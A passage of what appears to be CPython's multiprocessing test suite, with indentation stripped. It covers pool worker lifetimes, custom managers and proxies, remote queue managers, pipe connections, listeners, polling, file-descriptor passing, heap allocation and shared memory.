def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
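# FooBar exercises proxy method exposure: f() succeeds, g() raises ValueError,
# and _h() is private and only reachable when explicitly listed in 'exposed'.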
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
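# Proxy that forwards __next__ to the referent so the baz() generator can be
# iterated through the manager.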
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
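# Queue living in the manager's server process; clients retrieve a proxy to it
# via get_queue().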
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
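# Empty byte string used by _TestConnection._echo as an end-of-stream marker.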
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by the parent
# process immediately after the child is spawned. On Windows this
# sometimes failed on old versions because child_conn would be
# closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
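# Return True if fd refers to an open file descriptor in this process.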
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((test.support.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
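# ctypes structure shared between processes in the sharedctypes tests below.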
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals,
# maintain its connection with the current process, and succeed
# when asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows; shared memory
# will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
